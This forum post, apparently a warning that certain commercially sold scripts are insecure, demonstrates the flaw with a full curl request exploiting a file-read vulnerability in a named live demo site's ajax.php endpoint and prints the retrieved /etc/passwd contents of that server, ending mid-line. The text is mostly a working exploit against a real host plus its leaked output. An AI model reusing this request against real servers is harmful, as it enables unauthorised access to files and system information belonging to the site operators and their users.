Hi guys !
WARNING
Sylvain86 scripts have security flaws that allow access to all of your content on your servers.
An example with another script that sells (but it has the same vulnerabilities on the Live script):
~# curl 'http://demo.necatis.com/grabber_english/ajax.php?txt=/etc/passwd' -H 'Host: demo.necatis.com' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0' -H 'Accept: */*' -H 'Accept-Language: fr,en;q=0.7,en-US;q=0.3' --compressed -H 'DNT: 1' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer:
Downloading...' -H 'Connection: keep-alive'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:102:104:MySQL Server,,,:/nonexistent:/bin/false
psaadm:x:999:1000:psa user:/opt/psa/admin:/bin/false
popuser:x:30:31:POP3 service user:/var/qmail/popuser:/bin/false
mhandlers-user:x:31:31:mail handlers user:/:/bin/false
sw-cp-server:x:998:999:sw-cp-server user:/var/lib/sw-cp-server:/bin/false
postfix:x:103:106::/var/spool/postfix:/bin/false
drweb:x:104:1004:Dr.Web system account:/var/drweb:/bin/false
dovecot:x:997:1005:Dovecot IMAP server user:/usr/lib/dovecot:/bin/false
dovenull:x:996:1006:Dove